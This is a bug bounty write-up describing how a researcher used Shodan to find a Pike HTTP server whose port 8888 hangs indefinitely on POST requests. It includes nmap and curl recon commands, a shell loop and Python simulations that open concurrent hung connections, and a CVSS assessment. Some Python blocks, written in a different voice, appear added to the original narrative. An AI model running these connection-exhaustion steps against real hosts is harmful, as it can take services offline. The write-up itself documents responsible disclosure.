Found a Denial of Service Vulnerability in a Major Company’s Production Infrastructure Using Shodan
A bug bounty hunter searching a major tech company's IP range on Shodan found an unusual Pike HTTP server. While probing its open ports, port 8888 misbehaved on POST requests: the server accepted the data but never responded and held the connection open. Further testing showed the behavior could exhaust server resources, and the finding was confirmed and reported as a Denial of Service vulnerability.

2026-3-22 05:14:10 Source: infosecwriteups.com

Hacker MD

A step-by-step story of reconnaissance, discovery, and responsible disclosure


Bug bounty hunting is rarely glamorous. Most of the time, it’s hours of staring at HTTP responses, chasing dead ends, and questioning whether that “weird behavior” is actually a vulnerability or just… intended. This is the story of one of those hunts — where a simple Shodan search led me down a rabbit hole that ended with a legitimate Denial of Service vulnerability on production infrastructure serving millions of users.

The Hunt Begins: Shodan Reconnaissance

Every good bug hunt starts with reconnaissance. My target was a large tech company with a public bug bounty program that included IP ranges in their scope. This is often an overlooked attack surface — most researchers focus on web applications and APIs, ignoring raw IP ranges entirely.

I fired up Shodan and searched their IP range:

net:185.26.x.x/22

Most results were boring — a few nginx servers returning 301 redirects, some DNS servers. Standard stuff. But one IP caught my eye immediately.

The Interesting Host

One particular host stood out from the rest. While other servers in the range were running standard nginx, this one was running something completely different:

Server: Pike v8.0 release 908: HTTP Server module

Pike HTTP Server. Not something you see every day.

More interesting was the port list:

Open Ports: 22, 80, 123, 1080, 2049, 2345, 8081, 8192, 8888, 8889, 9000

Eleven open ports on a production server. Each one a potential story.

My eyes immediately went to a handful of unusual ports:

  • Port 2049 — traditionally NFS (Network File System)
  • Port 1080 — traditionally SOCKS proxy
  • Port 2345 — traditionally DBM (Database Manager)
  • Ports 8888/8889 — unknown Pike services

This was not a standard web server. This was infrastructure.

Peeling Back the Layers

NFS on Port 2049?

My first instinct was to enumerate the NFS service:

showmount -e [TARGET_IP]
# Result: clnt_create: RPC: Unable to receive

Interesting. The port was open but RPC wasn’t responding. I ran a more detailed nmap scan:

nmap -sV -p 111,2049 --script=rpcinfo [TARGET_IP]

The result was surprising. Port 2049 wasn’t NFS at all. It was responding with something completely custom:

_version\xa0\xe8\xa3\x06\x15cmbt9x79skf8qsbx8hr8q25xg

A custom binary protocol, disguised on the NFS port. Every request returned a different random session identifier. This was Opera’s internal proprietary protocol hiding in plain sight on a well-known port — security through obscurity.
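When a well-known port answers with something that clearly isn't its registered protocol, a raw banner grab is the quickest way to see what's actually there. The sketch below shows the technique in Python; since the real host can't be probed here, a local stub socket stands in for the unknown service (the stub, its banner bytes, and the port are all stand-ins, not the target).

```python
import socket
import threading

def probe_banner(host, port, payload=b"\r\n", timeout=5):
    """Connect, send a small nudge, and read whatever the service answers with."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(payload)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""  # silent service: no banner at all

# --- local stub standing in for the mystery service on "port 2049" ---
def _stub(server):
    conn, _ = server.accept()
    conn.recv(1024)
    # mimic the observed reply: a version blob plus a random-looking session id
    conn.sendall(b"_version\xa0\xe8\xa3\x06\x15cmbt9x79skf8qsbx8hr8q25xg")
    conn.close()

server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]
threading.Thread(target=_stub, args=(server,), daemon=True).start()

banner = probe_banner("127.0.0.1", port)
print(banner)
```

The same probe against the real host is what surfaced the `_version` blob above: send a few bytes, read raw, and let the reply tell you what protocol you're really talking to.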

Port 1080: Closed SOCKS

curl --socks5 [TARGET_IP]:1080 http://example.com
# Result: curl: (97) connection to proxy closed

Not an open proxy. The connection was closed immediately. Moving on.

Port 8888: Where Things Got Interesting

This is where the real story begins.

A simple GET request to port 8888:

curl http://[TARGET_IP]:8888/

Response:

HTTP/1.1 400 Bad Request
Server: Pike v8.0 release 908: HTTP Server module
Don't know how to handle request in ext.

Immediately interesting. “ext” — an internal Pike module. The server is telling me it has an extension module but doesn’t know how to handle my request. What happens with other HTTP methods?

curl -X PUT http://[TARGET_IP]:8888/
# Response: "Unhandled method in ext"
curl -X DELETE http://[TARGET_IP]:8888/
# Response: "Unhandled method in ext"

Different error messages for different methods. The server is clearly processing requests through an “ext” module handler. But what about POST?

curl -X POST -d "test" http://[TARGET_IP]:8888/

I stared at my terminal.

Nothing happened.

The cursor just… blinked.

The Vulnerability Reveals Itself

I waited. Five seconds. Ten seconds. Thirty seconds. A minute.

No response.

In my experience, this behavior — connection established, data sent, server silent — is almost always significant. Normal servers always respond, even if it’s just an error code. Silence is not normal.

I opened a second terminal and ran netstat monitoring:

watch -n 2 "netstat -tn | grep [TARGET_IP]:8888"

Then sent the POST request again. The netstat output showed:

tcp    0    0  MY_IP:44334    TARGET_IP:8888    ESTABLISHED

The connection was in ESTABLISHED state. The server had accepted my connection, received my data, and… stopped. No response. No timeout. Just open, consuming resources, indefinitely.

I set a 300-second timeout to measure exactly how long the server would hold the connection:

timeout 300 curl -X POST -d "test" http://[TARGET_IP]:8888/
echo $?

After exactly 300 seconds, my terminal returned:

124

Exit code 124. The timeout command killed the process because the server never responded in 300 seconds.

This was not normal behavior. This was a vulnerability.
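The curl-plus-timeout check above can be automated at the socket level: send a POST, then distinguish "server answered" from "server went silent" with a client-side timeout. Here is a minimal Python sketch of that probe; because the real target can't be hit from this page, a local stand-in server reproduces the vulnerable behavior (accept, read the data, never reply) purely for illustration.

```python
import socket
import threading

def post_and_wait(host, port, timeout=3):
    """Send a minimal POST and report whether the server ever answers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(b"POST / HTTP/1.1\r\nHost: x\r\n"
                  b"Content-Length: 4\r\n\r\ntest")
        try:
            return s.recv(1024)  # a healthy server answers here, even with an error
        except socket.timeout:
            return None          # the hang: data accepted, no reply ever

# --- local stand-in mimicking the bug: accept, read the POST, say nothing ---
def _hang(server):
    conn, _ = server.accept()
    conn.recv(4096)           # take the POST body...
    threading.Event().wait()  # ...then go silent forever, holding the socket open

server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
threading.Thread(target=_hang, args=(server,), daemon=True).start()

reply = post_and_wait("127.0.0.1", server.getsockname()[1])
print("hung" if reply is None else "answered")
```

`None` here is the socket-level equivalent of curl's exit code 124: the data was acknowledged, but no response byte ever came back.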

Understanding the Bug

Let me explain what was actually happening technically.

When you send an HTTP POST request to a normal server, the following happens:

Client → Server: TCP SYN
Server → Client: TCP SYN-ACK
Client → Server: TCP ACK (handshake complete)
Client → Server: HTTP POST data
Server → Client: HTTP Response (200, 400, 500, anything)
Connection closes.

On this server:

Client → Server: TCP SYN ✅
Server → Client: TCP SYN-ACK ✅
Client → Server: TCP ACK ✅ (handshake complete)
Client → Server: HTTP POST data ✅ (acknowledged by server)
Server → Client: ??? ❌ (NEVER SENT)
Connection stays OPEN indefinitely ❌

The Pike HTTP Server’s “ext” module was accepting POST requests, receiving the data, but then hanging in processing — never sending any HTTP response back. The connection stayed open, consuming a worker thread and memory, for as long as the client maintained it.

Critically: there was no timeout enforcement. The server had no mechanism to detect or kill hung connections.

Proving the Impact

Finding weird behavior is one thing. Proving exploitable impact is another. Bug bounty programs want to see: “As an attacker, what could I do?”

I needed to demonstrate that this wasn’t just an anomaly — it was a weaponizable vulnerability.

The Multi-Connection Test

I opened two terminal windows side by side and recorded everything:


Terminal 1 — Attack simulation:

for i in {1..5}; do 
echo "Starting connection $i at $(date +%T)"
timeout 60 curl -X POST -d "test$i" http://[TARGET_IP]:8888/ &
done

Terminal 2 — Real-time monitoring:

watch -n 1 "netstat -tn | grep [TARGET_IP]:8888"

The netstat output updated in real-time:

tcp    0    0  MY_IP:41740    TARGET_IP:8888    ESTABLISHED
tcp    0    0  MY_IP:41752    TARGET_IP:8888    ESTABLISHED
tcp    0    0  MY_IP:41762    TARGET_IP:8888    ESTABLISHED
tcp    0    0  MY_IP:41774    TARGET_IP:8888    ESTABLISHED
tcp    0    0  MY_IP:41782    TARGET_IP:8888    ESTABLISHED

Five simultaneous connections. All ESTABLISHED. All hanging. All consuming server resources.

Each connection was holding a worker thread hostage for 60 seconds. Scale this to 50 or 100 connections and you have complete service exhaustion — no legitimate user can get a response because all server workers are occupied with hung POST requests.
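The worker-exhaustion mechanic can be demonstrated end to end in a few lines of Python. This sketch is a local simulation only: a stand-in server that reads and never replies (mirroring the Pike ext behavior) and five concurrent "attack" connections, mirroring the netstat test above. Nothing here touches the real host.

```python
import socket
import threading
import time

# --- local stand-in: accepts connections, reads the POST, never replies ---
held = []

def _sink(server):
    while True:
        conn, _ = server.accept()
        conn.recv(4096)
        held.append(conn)  # keep the socket open: one "worker" tied up per client

server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(16)
port = server.getsockname()[1]
threading.Thread(target=_sink, args=(server,), daemon=True).start()

# open five concurrent connections, each sending a POST that will never be answered
conns = []
for i in range(5):
    c = socket.create_connection(("127.0.0.1", port))
    c.sendall(f"POST / HTTP/1.1\r\nContent-Length: 5\r\n\r\ntest{i}".encode())
    conns.append(c)

time.sleep(0.5)  # give the stand-in time to accept everything
print(f"{len(held)} server-side connections held open")
```

Every entry in `held` is a socket the "server" will never release on its own, which is exactly what the five ESTABLISHED rows in the netstat output represent.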

The Evidence Package

My complete evidence:

  1. Screenshot 1: Single POST request hanging — netstat showing ESTABLISHED, curl showing data sent but no response
  2. Screenshot 2: Exit code 124 after 300 seconds, connection transitioning to FIN_WAIT2 (server never properly closed the connection)
  3. Screenshot 3: Five simultaneous hung connections, all ESTABLISHED, all consuming resources

Vulnerability Classification

According to Bugcrowd VRT (Vulnerability Rating Taxonomy) v1.17:

  • Category: Application-Level Denial-of-Service (DoS)
  • Subcategory: Critical Impact and/or Easy Difficulty
  • Baseline Priority: P2 (High)

CVSS 3.1 Score: 7.5 (HIGH)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Breaking this down:

  • AV:N — Network accessible, no physical access needed
  • AC:L — Low complexity, simple curl command
  • PR:N — No privileges required, public endpoint
  • UI:N — No user interaction needed
  • A:H — High availability impact

Writing the Report

A bug bounty report lives or dies by how clearly it answers one question:

“As an attacker, what could I do?”

My answer:

“I can render this proxy service unavailable by sending concurrent POST requests that hang indefinitely. Each request consumes a worker thread for 300+ seconds with zero timeout enforcement. With just 10–20 connections from a single machine, all server workers become exhausted, preventing legitimate users from accessing the service entirely. The attack requires no authentication, no special tools, and can be sustained for hours.”

I structured the report with:

  • Clear vulnerability description
  • Technical root cause (Pike’s ext module missing timeout enforcement)
  • Step-by-step reproduction
  • Evidence screenshots embedded directly
  • CVSS score with justification
  • VRT classification with reasoning
  • Remediation recommendations
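The core remediation is timeout enforcement: every accepted connection must live under a hard deadline, after which the server closes it whether or not processing finished. Pike's actual configuration knobs aren't shown in the report, so the sketch below illustrates the principle generically in Python with a per-socket read deadline (the deadline value, the 405 reply, and the server itself are illustrative assumptions, not the vendor's fix).

```python
import socket
import threading

REQUEST_DEADLINE = 1.0  # seconds; anything slower or silent gets cut off

def serve_one(conn):
    """Handle one request under a hard deadline instead of hanging forever."""
    conn.settimeout(REQUEST_DEADLINE)  # applies to every recv on this socket
    try:
        conn.recv(4096)
        # (request processing would happen here, also under a watchdog)
        conn.sendall(b"HTTP/1.1 405 Method Not Allowed\r\nContent-Length: 0\r\n\r\n")
    except socket.timeout:
        pass                           # slow or silent client: drop it
    finally:
        conn.close()                   # the connection never outlives the deadline

server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]

def _accept_loop():
    while True:
        c, _ = server.accept()
        threading.Thread(target=serve_one, args=(c,), daemon=True).start()

threading.Thread(target=_accept_loop, daemon=True).start()

# a client that connects but never sends anything is closed after the deadline
probe = socket.create_connection(("127.0.0.1", port))
probe.settimeout(5)
closed = probe.recv(1024) == b""  # recv returns b"" once the server hangs up
print("closed by server" if closed else "still open")
```

With this pattern in place, the multi-connection attack above degrades from "indefinite worker exhaustion" to "each connection costs at most one deadline interval," which is the difference between an outage and a nuisance.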

The Triage Response

After submitting, I received a response from the triage team that initially caused confusion. They wrote:

“Without running the provided command, we are getting same result. Can you please double check whether you are actually able to perform DOS on mentioned host or not?”

They had tested the endpoint — but with a GET request, not a POST request. GET requests respond immediately with an error message. That’s expected and normal.

This is a common triage misunderstanding. The vulnerability is method-specific — GET works fine, POST hangs forever.

I responded with a clear side-by-side comparison:

GET Request (Normal behavior):

curl http://[TARGET_IP]:8888/
# Immediate response: "Don't know how to handle request in ext."
# Response time: < 1 second ✅

POST Request (Vulnerable behavior):

timeout 300 curl -X POST -d "test" http://[TARGET_IP]:8888/
echo $?
# No response for 300 seconds
# Exit code: 124 (timeout forced termination) ❌

The key lesson: always explicitly clarify which HTTP method, parameter, or condition triggers the vulnerability. Triage teams test quickly and may not try every variation.

Key Takeaways for Bug Hunters

1. Don’t Ignore IP Ranges in Scope

Most researchers focus exclusively on web domains. IP ranges are often where the interesting internal infrastructure lives — proxy servers, internal APIs, management interfaces. Shodan is your best friend here.

2. Unusual Servers = Unusual Vulnerabilities

When you see a non-standard server (Pike, Roxen, Resin, anything that isn’t nginx/Apache/IIS), treat it with extra scrutiny. Less common software often has less hardening, less community scrutiny, and more unexpected behavior.

3. Test All HTTP Methods Separately

GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD — they can all behave differently. A server that handles GET correctly might completely fail on POST. Always test each method explicitly.
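Method sweeps are easy to script: probe each verb with a hard client-side timeout and flag any that never answer. The sketch below runs the sweep against a local stub that answers everything except POST, reproducing this finding's pattern for illustration (the stub and its 400 reply are stand-ins; only the sweeping technique is the point).

```python
import http.client
import socket
import threading

# Local stub standing in for the target: answers every method except POST,
# and silently holds POST connections open (the observed vulnerable behavior).
hung = []

def _stub(server):
    while True:
        conn, _ = server.accept()
        req = conn.recv(4096)
        if req.startswith(b"POST"):
            hung.append(conn)  # never reply, keep the socket open
            continue
        conn.sendall(b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n")
        conn.close()

server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(8)
port = server.getsockname()[1]
threading.Thread(target=_stub, args=(server,), daemon=True).start()

# Probe each method with a hard client-side timeout and record what happens.
results = {}
for method in ("GET", "POST", "PUT", "DELETE"):
    c = http.client.HTTPConnection("127.0.0.1", port, timeout=2)
    try:
        c.request(method, "/", body=None if method == "GET" else "test")
        results[method] = c.getresponse().status
    except socket.timeout:
        results[method] = "HANG"
    finally:
        c.close()

print(results)
```

A `"HANG"` entry in a sweep like this is exactly the signal that deserves a second look; every other method returning promptly is what makes the one silent verb stand out.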

4. Silence is a Signal

If a server accepts your connection, receives your data, and then says nothing — that’s not “no vulnerability found.” That’s a behavior worth investigating deeply. Normal servers always respond, even with errors.

5. Measure Everything

Exit codes, response times, connection states — quantify your findings. “The server hangs” is weak. “The server holds connections open for 300+ seconds (exit code 124), while 5 concurrent connections remain in ESTABLISHED state simultaneously” is strong, documented evidence.

6. netstat is Your Best Friend for DoS PoC

Real-time connection monitoring with watch -n 1 "netstat -tn | grep TARGET" gives you indisputable visual proof of resource exhaustion. Screenshot it. Record it.

7. Clarify Method-Specific Bugs in Reports

Always explicitly state: “This vulnerability is triggered by POST requests specifically. GET requests behave normally.” Triage teams move fast and may test the wrong method.

Technical Summary

[The original post presents the technical summary as an image: a Pike v8.0 HTTP server found via Shodan in a bug bounty program's IP range, a POST-triggered indefinite connection hang on port 8888, rated CVSS 3.1 7.5 (High) / Bugcrowd VRT P2.]

Final Thoughts

This find reinforced something I believe deeply about bug hunting: the most interesting vulnerabilities are often hiding in plain sight, on ports and services that everyone else scrolls past.

A weird server on an unusual port. A POST request that didn’t respond. A blinking cursor that turned into a legitimate P2 vulnerability.

The technical skill here wasn’t complex. What mattered was:

  • Thorough reconnaissance
  • Curiosity about unusual behavior
  • Methodical documentation
  • Clear, honest impact assessment

If you’re new to bug bounty hunting, start with reconnaissance. Learn Shodan. Read program scopes carefully, including IP ranges. And when something behaves unexpectedly, don’t dismiss it. Investigate it.

That blinking cursor might just be your next bounty. 🎯

Happy hunting. Stay curious. Report responsibly.

Tags: #BugBounty #CyberSecurity #PenTesting #EthicalHacking #DoS #Shodan #WebSecurity #InfoSec #BugBountyTips #Reconnaissance




Source: https://infosecwriteups.com/found-a-denial-of-service-vulnerability-in-a-major-companys-production-infrastructure-using-shodan-e5f766a4df79?source=rss----7b722bfd1b8d--bug_bounty